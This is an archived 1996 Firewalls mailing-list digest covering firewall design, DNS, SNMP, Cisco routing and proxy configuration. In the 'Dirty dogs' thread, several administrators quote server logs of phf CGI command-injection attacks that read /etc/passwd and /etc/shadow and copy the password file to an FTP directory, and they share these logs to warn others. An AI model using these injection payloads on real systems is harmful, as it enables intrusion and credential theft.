Firewalls@GreatCircle.COM Subject: Extending Financial Applications And Protecting via a Firewall References: <199607030800.BAA28912@miles.greatcircle.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Our organization would like to extend a human resources application to the internet. Our goal is to allow end users to post payroll hours over the internet. The nature of the application requires allowing access to a production Oracle database. The only service to be provided is http. The database is production, must be updated by the end=user via the internet. What firewall strategies should be pursued for this type of endeaour? Any input would be appreciatted. From firewalls-owner Wed Jul 10 22:35:20 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id WAA05948 for firewalls-outgoing; Wed, 10 Jul 1996 22:20:57 -0700 (PDT) Received: from elaine18.Stanford.EDU (elaine18.Stanford.EDU [36.216.0.206]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id WAA05915 for ; Wed, 10 Jul 1996 22:20:38 -0700 (PDT) Received: (from jkoum@localhost) by elaine18.Stanford.EDU (8.7.5/8.7.3) id WAA04614; Wed, 10 Jul 1996 22:18:04 -0700 (PDT) Date: Wed, 10 Jul 1996 22:18:04 -0700 (PDT) From: Jan Koum To: Don Carney cc: firewalls@GreatCircle.COM, james@mail.state.mo.us Subject: Re: Dirty dogs In-Reply-To: <199607110420.VAA26247@mercury.hypersurf.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk May be, or may be not. Case of "not" is when genstar is started by hackers and maintained by hackers. In that case you don't have much left to do, which bring me to my question: How do you deal with hosts maintained by hackers? Who do you contact in case of problems? What is legality like on this? I am sure fbi woudn't worry about small/private hosts, and most local police don't know enogh about computers. On Wed, 10 Jul 1996, Don Carney wrote: > We had one on July 2nd. > > slip50.genstar.net - - [02/Jul/1996:16:46:55 -0700] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 27121 > > > maybe someone should send a note to genstar.net > > > Don Carney > Hypersurf Internet Services > From firewalls-owner Wed Jul 10 22:58:51 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id WAA04813 for firewalls-outgoing; Wed, 10 Jul 1996 22:05:13 -0700 (PDT) Received: from burnout.cts.com (burnout.cts.com [205.163.23.25]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id WAA04781 for ; Wed, 10 Jul 1996 22:05:01 -0700 (PDT) Received: from rruda (rruda.osti.com [204.212.129.32]) by burnout.cts.com (8.6.12/8.6.9) with SMTP id WAA05430; Wed, 10 Jul 1996 22:02:33 -0700 Received: by rruda with Microsoft Mail Message-ID: <01BB6EAC.43782C40@rruda> From: Richard Ruda To: "'GreatCircles firewall message host'" Cc: "'Bill Stout'" Subject: DNS problem with MS NTServer 4.0b2 Date: Wed, 10 Jul 1996 22:07:46 -0700 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Sender: firewalls-owner@GreatCircle.COM Precedence: bulk We are testing DNS with MS NTSERVER 4.02b. We still of course have our = internet provider sending mail to our pop server and we are still = relying on them..... We are also not DNS experts so you will excuse the ignorance. We have created our DNS server on our machine called ntserver Under the IP address for ntserver are all the in-addr.arpa records = (created automatically), cache, then our domain osti.com and underneath = this ntserver itself. (If you've setup DNS with 4.02b I hope you can follow this). IP xxx.xxx.xxx.xxx | 0.in-addr.arpa | 127.in-addr.arpa | 255.in-addr.arpa | Cache | osti.com |_ _ _ ntserver The records within osti.com include the NS (ntserver.osti.com) the SOA = (both these set up auto) and all our other hosts (manually entered). We = have not yet setup any other records under ntserver itself (not sure if = we have to) Mail continues to flow through our existing mail server from our = provider. Under TCP/IP properties the DNS search order is the IP address of = ntserver and second our internet providers. All continues to work fine except the following. To test I created resolv.conf on our HP box with following: domain osti.com namserver xxx.xxx.xxx.xxx =20 all works fine and the HP sees the name server, ntserver. However we have a test program that runs sendmail to send mail back to = me rruda@osti.com and to an outside domain. The outside domain receives = mail but I do not get anything back. (The program runs sendmail on the = HP and mails it to me rruda@osti.com) The Mailer Daemon on the HP tells me that it has returned mail for me - = Returned mail, host unknown. osti.com is unknown.Why can I see other = domains but not my own? Ping and finger seem to confirm this. Clearly not all the records have been setup for DNS and this is the = probelm (we are still relying on our internet provider for outside = resolution). I have DNS and BIND and have read usefull sections but = cannot readily translate for NT/this problem.=20 Can anyone assist please as to what we need to do?=20 Thanks Richard Ruda From firewalls-owner Wed Jul 10 23:09:21 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id WAA07924 for firewalls-outgoing; Wed, 10 Jul 1996 22:48:30 -0700 (PDT) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-951221-1) id WAA07914 for firewalls@greatcircle.com; Wed, 10 Jul 1996 22:48:24 -0700 (PDT) Received: from phoenix.iss.net (phoenix.iss.net [204.241.60.5]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id IAA22041 for ; Wed, 10 Jul 1996 08:33:54 -0700 (PDT) Received: from alexf.iss.net (alexf.iss.net [204.241.60.153]) by phoenix.iss.net (8.6.13/8.6.12) with SMTP id LAA12099; Wed, 10 Jul 1996 11:31:05 -0400 Message-Id: <199607101531.LAA12099@phoenix.iss.net> Comments: Authenticated sender is From: "Alex F" Organization: Internet Security Systems, Inc. To: mbai@straticom.com Date: Wed, 10 Jul 1996 11:32:30 +0000 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: NT Backoffice "Catapult" firewall certified? Reply-to: alexf@iss.net CC: firewalls@GreatCircle.COM X-mailer: Pegasus Mail for Win32 (v2.32a) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > John Betts wrote: > How does NT allow anyone to read and write to the registry? Could you > also forward the address for the listserv for the ntsecurity list? We To subscribe to the NTSecurity list send mail to majordomo@iss.net with the following in the body subscribe ntsecurity my@email.address (Where my@email.address is your email address). Soon you'll be able to sign up over the web for the list (just gotta get around to it). Alex F alexf@iss.net =-=-=-=-=-=-=-=-=-=-=-=-=- Alex F alexf@iss.net Marketing Specialist Internet Security Systems =-=-=-=-=-=-=-=-=-=-=-=-=- From firewalls-owner Wed Jul 10 23:23:52 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id WAA07696 for firewalls-outgoing; Wed, 10 Jul 1996 22:46:39 -0700 (PDT) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-951221-1) id WAA07622 for firewalls@greatcircle.com; Wed, 10 Jul 1996 22:46:20 -0700 (PDT) Received: from uustar.starnet.net (uustar.starnet.net [199.217.253.12]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id SAA01625 for ; Tue, 9 Jul 1996 18:57:08 -0700 (PDT) Received: from hq.UUCP by uustar.starnet.net with UUCP id AA09710 Received: (from daemon@localhost) by hq.agedwards.com (8.6.9/8.6.9) id SAA16078 for firewalls@greatcircle.com.outbound; Tue, 9 Jul 1996 18:10:38 -0500 Received: from igate.agedwards.com (igate.agedwards.com [159.45.56.11]) by hq.agedwards.com (8.6.9/8.6.9) with ESMTP id SAA16074 for ; Tue, 9 Jul 1996 18:10:37 -0500 Received: from Microsoft Mail (PU Serial #1093) From: nicholscs@agedwards.com (Nichols,Christopher) To: firewalls@greatcircle.com ('SMTP: firewalls@greatcircle.com') Message-Id: <1996Jul09.180928.1093.58516@igate.agedwards.com> X-Mailer: Microsoft Mail via PostalUnion/SMTP for Windows NT Mime-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Organization: A.G. Edwards & Sons Inc. St. Louis Date: Tue, 09 Jul 1996 18:11:33 -0500 Subject: snmp Sender: firewalls-owner@GreatCircle.COM Precedence: bulk What are the risks of running an snmp agent on a firewall? For example, to monitor your ISP or your external router? and then periodically retrieve the data off of the box via an encrypted tunnel or ssh back to your Openview server on the internal net. If there are serious risks with snmp then what are others doing? Is there a proxy available (i.e. fwtk)? Chris From firewalls-owner Thu Jul 11 02:35:38 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id CAA23879 for firewalls-outgoing; Thu, 11 Jul 1996 02:16:15 -0700 (PDT) Received: from isgate.is (isgate.is [193.4.58.51]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id CAA23862 for ; Thu, 11 Jul 1996 02:15:57 -0700 (PDT) Received: from linda.if.is by isgate.is (8.7.5-M/ISnet/14-10-91); Thu, 11 Jul 1996 09:13:23 GMT Received: by linda.if.is (Secure/IFnet/26-04-96); Thu, 11 Jul 1996 09:13:22 GMT From: gunni@if.is (Gunnar Ingvi Thorisson) Message-Id: <199607110913.JAA26973@linda.if.is> Subject: Re: Dirty dogs To: firewalls@GreatCircle.COM Date: Thu, 11 Jul 1996 09:13:22 +0000 (GMT) X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk annex059.ridgecrest.ca.us unknown - [17/Jun/1996:00:28:29 +0000] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Aid%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 116 annex059.ridgecrest.ca.us unknown - [17/Jun/1996:00:29:04 +0000] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Acat%20/etc/passwd%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 7241 annex059.ridgecrest.ca.us unknown - [17/Jun/1996:00:29:48 +0000] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Acat%20/etc/passwd%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 7241 annex059.ridgecrest.ca.us unknown - [17/Jun/1996:00:29:57 +0000] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Auname%20-a%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 154 annex059.ridgecrest.ca.us unknown - [17/Jun/1996:00:31:30 +0000] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Acat%20/etc/shadow%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 105 annex059.ridgecrest.ca.us unknown - [17/Jun/1996:00:32:06 +0000] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Als%20-la%20/etc/shadow%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 175 annex059.ridgecrest.ca.us unknown - [17/Jun/1996:00:35:24 +0000] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Als%20-la%20/etc/shadow%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 0 kuddp45.zilker.net unknown - [17/Jun/1996:00:35:44 +0000] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Als%20-la%20/etc/shadow%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 175 kuddp45.zilker.net unknown - [17/Jun/1996:00:37:21 +0000] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Als%20-la%20/etc/shadow%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 175 kuddp45.zilker.net unknown - [17/Jun/1996:00:38:24 +0000] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Agrep%20ftp%20/etc/passwd%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 138 kuddp45.zilker.net unknown - [17/Jun/1996:00:40:21 +0000] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Acp%20/etc/passwd%20%7Eftp/incoming%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 119 kuddp45.zilker.net unknown - [17/Jun/1996:00:40:46 +0000] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Aid%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 116 kuddp45.zilker.net unknown - [17/Jun/1996:00:41:22 +0000] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Als%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 300 kuddp45.zilker.net unknown - [17/Jun/1996:00:42:49 +0000] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Aecho%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 95 kuddp45.zilker.net unknown - [17/Jun/1996:00:43:18 +0000] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Als%20%7Eftp/incoming%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 107 hugh.ndl.net unknown - [30/Jun/1996:00:31:31 +0000] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Aid%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 116 [Mon Jun 17 00:35:24 1996] HTTPd: send aborted for annex059.ridgecrest.ca.us, URL: /cgi-bin/phf Hmmm... obviously the same person on zilker.net and ridgecrest.ca.us grrrr... Kær kveðja, Gunni ========================================================================= Gunnar Ingvi Þórisson E-Mail address: gunni@if.is Kerfisstjóri og forritari, system administrator and programmer Íslensk forritaþróun hf. (Iceland Software Inc.) Suðurlandsbraut 4, IS-108 Reykjavík, Ísland Sími: (+354) 588-1511 Fax: (+354) 588-8728 ========================================================================= From firewalls-owner Thu Jul 11 03:19:38 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id DAA26007 for firewalls-outgoing; Thu, 11 Jul 1996 03:09:26 -0700 (PDT) Received: from pegase.total.fr (pegase.total.fr [146.249.152.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id DAA25977 for ; Thu, 11 Jul 1996 03:09:03 -0700 (PDT) Received: from tidtest.total.fr (tidtest.total.fr [146.249.165.73]) by pegase.total.fr (8.6.8/8.6.6) with SMTP id MAA11955; Thu, 11 Jul 1996 12:06:58 +0200 Received: by tidtest.total.fr (4.1/SMI-4.1) Message-Id: <9607111005.AA23852@tidtest.total.fr> To: "John M. Shaw" Cc: firewalls@greatcircle.com Subject: Re: Re[2]: Newbie Cisco Access-List Question In-Reply-To: Your message of "Wed, 10 Jul 1996 10:38:05 CST." X-Cuse: "The dog ate my network" Date: Thu, 11 Jul 1996 12:05:32 +0100 From: Michel Lavondes Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In message <9606108370.AA837020476@cc1.dttus.com>, "John M. Shaw" writes: > > Is is the same for "ip route": > > If I have 2 lines from my ISP hooked up to the serial lines on my > router : > > ip route 0.0.0.0 0.0.0.0 Serial0 > ip route 0.0.0.0 0.0.0.0 Serial1 > > Will anything get sent over Serial1? > Is there a way to somewhat balance the load between the 2 lines? > Yes to both questions, with qualifications : - if you use fast switching (default), or autonomous/silicon/optimum switching on the high-end boxes, load balancing is per-destination (ie, once an interface has been choosen for a given destination address, all packets to that destination will go out that interface) - if you use process switching (no ip route-cache on the interface or some other configuration option that doesn't work with caching), load balancing is per-packet. BTW, these questions are best asked of cisco@spot.colorado.edu. HTH Michel Lavondes (lavondes@tidtest.total.fr) #include Governments are guilty until proved innocent From firewalls-owner Thu Jul 11 03:34:43 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id DAA26467 for firewalls-outgoing; Thu, 11 Jul 1996 03:19:07 -0700 (PDT) Received: from h01.scientia.com (h01.scientia.com [194.216.183.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id DAA26453 for ; Thu, 11 Jul 1996 03:18:58 -0700 (PDT) Received: by h01.scientia.com with SMTP id LAA07208 for ; Thu, 11 Jul 1996 11:16:35 +0100 Message-Id: <199607111016.LAA07208@h01.scientia.com> X-Sender: firewall@pop-server X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Thu, 11 Jul 1996 10:16:15 +0100 To: firewalls@greatcircle.com From: Ian Miller Subject: Re: Threats and Nasty Emails Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 17:17 09/07/96 -0700, Michael Dillon wrote: >This is easier than you think. If you print out copies of all messages >with full headers as well as your log files then you may find that the >courts accept that as conclusive proof. There have been cases in the USA >where such evidence was accepted. You should make sure to do the printouts >immediately in front of witnesses and then have them notarized. > I don't know about the position in the USA. However the person making the threats is in the UK and would have to be sued here. In a very recent case computer evidence was declared inadmissable because the organisation relying on it refused to allow the defendant's security consultant access to their system to carry out a security audit. [The case of policeman assumed of fraud over phantom cash-machine withdrawals.] In the case of trying to prove the source of e-mail, you would have to audit every machine that had contributed to the headers. I think this would be a helpless cause. Log files may be considered "conclusive proof" in the USA, but they quite rightly aren't in the UK. Ian From firewalls-owner Thu Jul 11 03:42:51 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id DAA26124 for firewalls-outgoing; Thu, 11 Jul 1996 03:11:03 -0700 (PDT) Received: from dns2 (dns2.datlog.co.uk [193.128.221.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id DAA26072 for ; Thu, 11 Jul 1996 03:10:39 -0700 (PDT) Received: from luggage.datlog.co.uk by dns2 with smtp Message-Id: Date: Thu, 11 Jul 1996 11:07:58 +0000 From: Graham Jack Subject: Re: Web Server on the DMZ To: firewalls@greatcircle.com X-Mailer: PC Mail Manager 1.0 MIME-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk BobK suggested: > Yes, you can put the web server on your DMZ, but the real answer here > is to run TWO firewalls. > Like so: > - --company net ---/Corp-Firewall/---DMZ w/servers---/outer firewall/ --Internet > The job of the Corp-Firewall is to protect the company network, the > job of the outer firewall is to protect the exposed servers. As originally conceived, the job of the firewall was to provide a high security door into an area where lower security controls are in use. The logic for this is that in a large network, you cannot keep all the systems on your network configured to a suitable level of security to resist a direct attack from the network, so you implement the serious controls in one place ("put all your eggs in one basket - but WATCH THAT BASKET" as someone famous once said). As long as the number of systems exposed to the Internet is small, there is no reason why they can't be secured sufficiently to not require additional protection - what controls can you put in the outer firewall that you can't implement (more) effectively on the exposed server itself? You have to accept the risk that systems exposed to direct connections from the Internet may be compromised. The wise designer places an exposed server on the wrong side of a filtering bridge so that, even if it is compromised, it can't snoop on the traffic that flows between the outer router and the firewall component(s). -- Regards, ------------------------------------------------------------------------ Graham Jack Data Logic Ltd Consultant CI Tower, St. Georges Square EMail: gjack@datlog.co.uk High Street, New Malden Direct: +44 181 388-0334 Surrey, KT3 4HH Switchboard: +44 181 715-9696 FAX: +44 181 715-1771 ------------------------------------------------------------------------ From firewalls-owner Thu Jul 11 04:19:55 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA29715 for firewalls-outgoing; Thu, 11 Jul 1996 04:05:39 -0700 (PDT) Received: from sic.se (mailbox.sic.se [194.236.7.200]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id EAA29708 for ; Thu, 11 Jul 1996 04:05:29 -0700 (PDT) Received: from pamela.sic.se (pamela.sic.se [194.236.7.44]) by sic.se (8.7.5/8.7.2) with SMTP id NAA06296; Thu, 11 Jul 1996 13:00:51 +0200 (MET DST) X-Mailer: InterCon tcpCONNECT4 4.0b26 (Macintosh) MIME-Version: 1.0 Message-Id: <9607111303.AA02759@pamela.sic.se> Date: Thu, 11 Jul 1996 13:03:02 +0100 From: "Stefan Berg" To: "De Mees, Frederic" Cc: firewalls@GreatCircle.com Subject: Re: News-proxy for TIS fwtk? Content-Type: Text/Plain; charset=US-ASCII Content-Disposition: Inline Sender: firewalls-owner@GreatCircle.COM Precedence: bulk De Mees, Frederik wrote: > > Hello all of you three ! > > >>Date: Wed, 10 Jul 1996 13:36:44 +0100 > >>From: "Stefan Berg" > >>Subject: Re: News-proxy for TIS fwtk? > >> > >>Great thanks to Shepherd Rudie [I HOPE YOUR ADDRESS IS OK !! FDM] > >>and Jean-Francois Zwobada for your help. > >>My news works just fine now :) > >> > >>/Stefan > > What happens more and more often is that companies (Microsoft for > example) offer their support via a private news-server, sometimes > needing authentication. > > If you hardwire a plug-gw to your usual news server , the connection > to any other news server remains impossible. > > I imagined putting more plug-gw's on other ports but newsread programs > do not allow changing the default port (119). > > Can you help ? Well here is a little suggestion (firewall-subscribers correct me) that may work if you want different news servers for _different machines_: I put in the rule: plug-gw: port nntp *.my.domain -plug-to external.news.server -port nntp If you want to be able to connect to several different news servers you could do this perhaps: plug-gw: port nntp 1.my.domain -plug-to 1external.news.server -port nntp plug-gw: port nntp 2.my.domain -plug-to 2external.news.server -port nntp where 1.my.domain connects to the 1external.news.server and 2.my.domain connects to 2external.news.server. Just an idea. Haven't tried it yet. /Stefan -- _______________________________________________________ Stefan Berg ISDN Group of Sweden / Svenska InternetCentralen Phone: +46-8-6677010 E-mail: stefan@sic.se WWW: http://www.sic.se/ http://www.isdn.se/ _______________________________________________________ Recursive; adj. see Recursive From firewalls-owner Thu Jul 11 05:19:40 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA04916 for firewalls-outgoing; Thu, 11 Jul 1996 05:03:24 -0700 (PDT) Received: from dtcro002.apogee-com.fr (firewall.apogee-com.fr [194.2.187.130]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id FAA04906 for ; Thu, 11 Jul 1996 05:03:14 -0700 (PDT) Received: by dtcro002.apogee-com.fr; id NAA11011; Thu, 11 Jul 1996 13:57:19 +0200 (MET DST) Received: from dtcxs001.apogee-com.fr(10.129.16.1) by firewall.apogee-com.fr via smap (V3.1.1) Received: from ingpc003.apogee-com.fr by dtcxs001.apogee-com.fr (4.1/SMI-4.1) Message-Id: <31E4EC06.1BA4@apogee-com.fr> Date: Thu, 11 Jul 1996 13:56:54 +0200 From: Jean-Francois Zwobada Organization: APOGEE Communications X-Mailer: Mozilla 2.02 (Win95; I) Mime-Version: 1.0 To: Stefan Berg Cc: "De Mees, Frederic" Subject: Re: News-proxy for TIS fwtk? References: <9607111303.AA02759@pamela.sic.se> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi Stefan, You're absolutely right, this is way you can do if you want different news servers available for different internal clients. With the Gauntlet, if you omit the "-plug-to" option, every address declared in the 'source field' is able to connect to everywhere. It is not true with the toolkit, unfortunately. With the toolkit, you should consider listening on a different port for every external server you want to contact. But it seems that news clients don't want to connect to something different from 119... plug-gw: port nntp1 mynet.* -plug-to 1external.news.server -port nntp plug-gw: port nntp2 mynet.* -plug-to 2external.news.server -port nntp ... Regards, Jean-Francois -- ______________________ Jean-Francois Zwobada ____________________ Apogee Communications Tel : +33 (1) 69 85 56 47 Parc Club Universite Fax : +33 (1) 69 85 56 48 28, rue Jean Rostand 91893 ORSAY Cedex e-mail : zwobada@apogee-com.fr __________________________________________________________________ From firewalls-owner Thu Jul 11 05:34:42 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA05724 for firewalls-outgoing; Thu, 11 Jul 1996 05:23:47 -0700 (PDT) Received: from gatekeeper.ray.com (gatekeeper.ray.com [138.125.162.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id FAA05717 for ; Thu, 11 Jul 1996 05:23:40 -0700 (PDT) Received: (mailer@localhost) by gatekeeper.ray.com (8.7.5/8.7.3) id IAA24415; Thu, 11 Jul 1996 08:20:25 -0400 Received: from eoits1.eo.ray.com by gatekeeper.ray.com; Thu Jul 11 08:19:34 1996 Received: by eo.ray.com (5.0/SMI-SVR4) Date: Thu, 11 Jul 1996 08:19:12 -0400 From: hhantman@eo.ray.com (Howard Hantman) Message-Id: <9607111219.AA25794@eo.ray.com> To: dcarney@hypersurf.com, james@mail.state.mo.us Subject: Re: Dirty dogs Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Well, folks, whether or not you try to contact genstar.net or zilker.net is one issue, but I would definately do SOMETHING, at least on your own systems. Both of these log snippets indicate a SUCCESSFUL use of this attack. Especially now that you've published your vulnerability to the world, I hope you're disabling the script! Howard Hantman Manager, Technology Integration Corporate ITS Raytheon Company > From: Don Carney > To: firewalls@GreatCircle.COM, james@mail.state.mo.us > Subject: Re: Dirty dogs > > We had one on July 2nd. > > slip50.genstar.net - - [02/Jul/1996:16:46:55 -0700] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 27121 > From: gunni@if.is (Gunnar Ingvi Thorisson) > Subject: Re: Dirty dogs > To: firewalls@GreatCircle.COM > Date: Thu, 11 Jul 1996 09:13:22 +0000 (GMT) > Mime-Version: 1.0 > Content-Transfer-Encoding: quoted-printable > > annex059.ridgecrest.ca.us unknown - [17/Jun/1996:00:28:29 +0000] "GET /cg= > i-bin/phf?Jserver=3Dns.uiuc.edu%0Aid%0A&Qalias=3D&Qname=3Dfoo&Qemail=3D&Q= > nickname=3D&Qoffice_phone=3D&Qcallsign=3D&Qproxy=3D&Qhigh_school=3D&Qslip= > =3D HTTP/1.0" 200 116 > annex059.ridgecrest.ca.us unknown - [17/Jun/1996:00:29:04 +0000] "GET /cg= > i-bin/phf?Jserver=3Dns.uiuc.edu%0Acat%20/etc/passwd%0A&Qalias=3D&Qname=3D= > foo&Qemail=3D&Qnickname=3D&Qoffice_phone=3D&Qcallsign=3D&Qproxy=3D&Qhigh_= > school=3D&Qslip=3D HTTP/1.0" 200 7241 > annex059.ridgecrest.ca.us unknown - [17/Jun/1996:00:29:48 +0000] "GET /cg= > i-bin/phf?Jserver=3Dns.uiuc.edu%0Acat%20/etc/passwd%0A&Qalias=3D&Qname=3D= > foo&Qemail=3D&Qnickname=3D&Qoffice_phone=3D&Qcallsign=3D&Qproxy=3D&Qhigh_= > school=3D&Qslip=3D HTTP/1.0" 200 7241 > annex059.ridgecrest.ca.us unknown - [17/Jun/1996:00:29:57 +0000] "GET /cg= > i-bin/phf?Jserver=3Dns.uiuc.edu%0Auname%20-a%0A&Qalias=3D&Qname=3Dfoo&Qem= > ail=3D&Qnickname=3D&Qoffice_phone=3D&Qcallsign=3D&Qproxy=3D&Qhigh_school=3D= > &Qslip=3D HTTP/1.0" 200 154 > annex059.ridgecrest.ca.us unknown - [17/Jun/1996:00:31:30 +0000] "GET /cg= > i-bin/phf?Jserver=3Dns.uiuc.edu%0Acat%20/etc/shadow%0A&Qalias=3D&Qname=3D= > foo&Qemail=3D&Qnickname=3D&Qoffice_phone=3D&Qcallsign=3D&Qproxy=3D&Qhigh_= > school=3D&Qslip=3D HTTP/1.0" 200 105 > annex059.ridgecrest.ca.us unknown - [17/Jun/1996:00:32:06 +0000] "GET /cg= > i-bin/phf?Jserver=3Dns.uiuc.edu%0Als%20-la%20/etc/shadow%0A&Qalias=3D&Qna= > me=3Dfoo&Qemail=3D&Qnickname=3D&Qoffice_phone=3D&Qcallsign=3D&Qproxy=3D&Q= > high_school=3D&Qslip=3D HTTP/1.0" 200 175 > annex059.ridgecrest.ca.us unknown - [17/Jun/1996:00:35:24 +0000] "GET /cg= > i-bin/phf?Jserver=3Dns.uiuc.edu%0Als%20-la%20/etc/shadow%0A&Qalias=3D&Qna= > me=3Dfoo&Qemail=3D&Qnickname=3D&Qoffice_phone=3D&Qcallsign=3D&Qproxy=3D&Q= > high_school=3D&Qslip=3D HTTP/1.0" 200 0 > kuddp45.zilker.net unknown - [17/Jun/1996:00:35:44 +0000] "GET /cgi-bin/p= > hf?Jserver=3Dns.uiuc.edu%0Als%20-la%20/etc/shadow%0A&Qalias=3D&Qname=3Dfo= > o&Qemail=3D&Qnickname=3D&Qoffice_phone=3D&Qcallsign=3D&Qproxy=3D&Qhigh_sc= > hool=3D&Qslip=3D HTTP/1.0" 200 175 > kuddp45.zilker.net unknown - [17/Jun/1996:00:37:21 +0000] "GET /cgi-bin/p= > hf?Jserver=3Dns.uiuc.edu%0Als%20-la%20/etc/shadow%0A&Qalias=3D&Qname=3Dfo= > o&Qemail=3D&Qnickname=3D&Qoffice_phone=3D&Qcallsign=3D&Qproxy=3D&Qhigh_sc= > hool=3D&Qslip=3D HTTP/1.0" 200 175 > kuddp45.zilker.net unknown - 